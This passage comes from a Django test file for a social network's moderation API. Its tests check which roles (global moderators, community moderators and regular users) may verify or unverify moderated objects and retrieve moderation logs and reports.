verified=False
).exists())
def test_can_verify_community_moderated_object_if_global_moderator(self):
"""
should be able to verify a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=True
).exists())
def test_cant_verify_community_moderated_object_if_community_moderator(self):
"""
should not be able to verify a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=False
).exists())
def test_cant_verify_community_moderated_object_if_regular_user(self):
"""
should not be able to verify a community moderated object if regular user
"""
regular_user = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=False
).exists())
def test_can_verify_community_post_moderated_object_if_global_moderator(self):
"""
should be able to verify a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=True
).exists())
def test_cant_verify_community_post_moderated_object_if_community_moderator(self):
"""
should not be able to verify a community_post moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=False
).exists())
def test_cant_verify_community_post_moderated_object_if_regular_user(self):
"""
should not be able to verify a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=False
).exists())
def test_can_verify_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to verify a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=True
).exists())
def test_cant_verify_community_post_comment_moderated_object_if_community_moderator(self):
"""
should not be able to verify a community_post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=False
).exists())
def test_cant_verify_community_post_comment_moderated_object_if_regular_user(self):
"""
should not be able to verify a community_post_comment moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=False
).exists())
def test_creates_verified_changed_log_on_verify(self):
"""
should create a verified changed log on verify
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectVerifiedChangedLog.objects.filter(
changed_from=False,
changed_to=True,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def test_on_critical_severity_post_moderated_object_verify_should_delete_image(self):
"""
on critical severity post moderated object, verify should delete image
"""
global_moderator = make_global_moderator()
post_creator = make_user()
image = Image.new('RGB', (100, 100))
tmp_file = tempfile.NamedTemporaryFile(suffix='.jpg')
image.save(tmp_file)
tmp_file.seek(0)
post = post_creator.create_public_post(text=make_fake_post_text(), image=File(tmp_file))
reporter_user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
post.refresh_from_db()
with self.assertRaises(FileNotFoundError):
file = post.image.image.file
def _get_url(self, moderated_object):
return reverse('verify-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
def _get_moderation_category_severities(self):
return (
ModerationCategory.SEVERITY_CRITICAL,
ModerationCategory.SEVERITY_HIGH,
ModerationCategory.SEVERITY_MEDIUM,
ModerationCategory.SEVERITY_LOW,
)
class UnverifyModeratedObjectApiTests(OpenbookAPITestCase):
"""
UnverifyModeratedObjectApi
"""
def test_can_unverify_moderated_object_if_global_moderator_and_approved(self):
"""
should be able to unverify a user moderated object if global moderator and approved
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_can_unverify_moderated_object_if_global_moderator_and_rejected(self):
"""
should be able to unverify a user moderated object if global moderator and rejected
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_cant_unverify_user_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a user moderated object if community moderator
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_cant_unverify_user_moderated_object_if_regular_user(self):
"""
should not be able to unverify a user moderated object if regular user
"""
regular_user = make_user()
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_can_unverify_community_moderated_object_if_global_moderator(self):
"""
should be able to unverify a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=False
).exists())
def test_cant_unverify_community_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=True
).exists())
def test_cant_unverify_community_moderated_object_if_regular_user(self):
"""
should not be able to unverify a community moderated object if regular user
"""
regular_user = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=True
).exists())
def test_can_unverify_community_post_moderated_object_if_global_moderator(self):
"""
should be able to unverify a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=False
).exists())
def test_cant_unverify_community_post_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a community_post moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=True
).exists())
def test_cant_unverify_community_post_moderated_object_if_regular_user(self):
"""
should not be able to unverify a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=True
).exists())
def test_can_unverify_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to unverify a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=False
).exists())
def test_cant_unverify_community_post_comment_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a community_post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=True
).exists())
def test_cant_unverify_community_post_comment_moderated_object_if_regular_user(self):
"""
should not be able to unverify a community_post_comment moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=True
).exists())
def test_creates_verified_changed_log_on_unverify(self):
"""
should create a verified changed log on unverify
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectVerifiedChangedLog.objects.filter(
changed_from=True,
changed_to=False,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def _get_url(self, moderated_object):
return reverse('unverify-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
class ModeratedObjectLogs(OpenbookAPITestCase):
def test_can_retrieve_community_moderation_object_logs_if_staff(self):
"""
should be able to retrieve community moderation object logs if staff and return 200
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderation_categories = json.loads(response.content)
self.assertEqual(len(response_moderation_categories), len(moderated_object_logs_ids))
for response_moderationCategory in response_moderation_categories:
response_moderation_category_id = response_moderationCategory.get('id')
self.assertIn(response_moderation_category_id, moderated_object_logs_ids)
def test_cant_retrieve_community_moderation_object_logs_if_not_staff(self):
"""
should not be able to retrieve community moderation logs if not staff and return 400
"""
community_creator = make_user()
community = make_community(creator=community_creator)
user = make_user()
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_can_retrieve_global_moderation_object_logs_if_global_moderator(self):
"""
should be able to retrieve global moderation object logs if global moderator and return 200
"""
global_moderator = make_global_moderator()
moderated_object = make_moderated_object()
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderation_categories = json.loads(response.content)
self.assertEqual(len(response_moderation_categories), len(moderated_object_logs_ids))
for response_moderationCategory in response_moderation_categories:
response_moderation_category_id = response_moderationCategory.get('id')
self.assertIn(response_moderation_category_id, moderated_object_logs_ids)
def test_cant_retrieve_global_moderation_object_logs_if_not_global_moderator(self):
"""
should not be able to retrieve global moderation object logs if not global moderator and return 200
"""
user = make_user()
moderated_object = make_moderated_object()
amount_of_moderated_object_logs = 5
moderated_object_logs_ids = []
for i in range(0, amount_of_moderated_object_logs):
moderated_object_log = make_moderated_object_log(moderated_object=moderated_object)
moderated_object_logs_ids.append(moderated_object_log.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def _get_url(self, moderated_object):
return reverse('moderated-object-logs', kwargs={
'moderated_object_id': moderated_object.pk
})
class ModeratedObjectReports(OpenbookAPITestCase):
def test_can_retrieve_community_moderation_object_reports_if_staff(self):
"""
should be able to retrieve community moderation object reports if staff and return 200
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderation_categories = json.loads(response.content)
self.assertEqual(len(response_moderation_categories), len(moderated_object_reports_ids))
for response_moderationCategory in response_moderation_categories:
response_moderation_category_id = response_moderationCategory.get('id')
self.assertIn(response_moderation_category_id, moderated_object_reports_ids)
def test_cant_retrieve_community_moderation_object_reports_if_not_staff(self):
"""
should not be able to retrieve community moderation reports if not staff and return 400
"""
community_creator = make_user()
community = make_community(creator=community_creator)
user = make_user()
moderated_object = make_moderated_object(community=community)
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_can_retrieve_global_moderation_object_reports_if_global_moderator(self):
"""
should be able to retrieve global moderation object reports if global moderator and return 200
"""
global_moderator = make_global_moderator()
moderated_object = make_moderated_object()
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_moderation_categories = json.loads(response.content)
self.assertEqual(len(response_moderation_categories), len(moderated_object_reports_ids))
for response_moderationCategory in response_moderation_categories:
response_moderation_category_id = response_moderationCategory.get('id')
self.assertIn(response_moderation_category_id, moderated_object_reports_ids)
def test_cant_retrieve_global_moderation_object_reports_if_not_global_moderator(self):
"""
should not be able to retrieve global moderation object reports if not global moderator and return 200
"""
user = make_user()
moderated_object = make_moderated_object()
amount_of_moderated_object_reports = 5
moderated_object_reports_ids = []
for i in range(0, amount_of_moderated_object_reports):
moderated_object_report = make_moderated_object_report(moderated_object=moderated_object)
moderated_object_reports_ids.append(moderated_object_report.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(user)
response = self.client.get(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def _get_url(self, moderated_object):
return reverse('moderated-object-reports', kwargs={
'moderated_object_id': moderated_object.pk
})
